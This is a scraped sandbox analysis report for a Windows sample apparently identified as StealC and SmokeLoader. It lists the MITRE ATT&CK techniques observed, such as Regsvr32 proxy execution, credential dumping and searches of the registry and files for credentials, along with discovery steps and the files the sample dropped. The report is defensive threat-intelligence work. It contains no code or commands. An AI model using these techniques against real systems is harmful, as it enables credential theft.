Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 16GAuqLUFK.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: SmokeLoader

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Privilege Escalation

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AQRFEVRTGL.docx

C:\ProgramData\ATJBEMHSSB.xlsx

C:\ProgramData\BJZFPPWAPT.xlsx

C:\ProgramData\CAFIJKFH

C:\ProgramData\DUUDTUBZFW.xlsx

Windows Analysis Report
16GAuqLUFK.exe

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre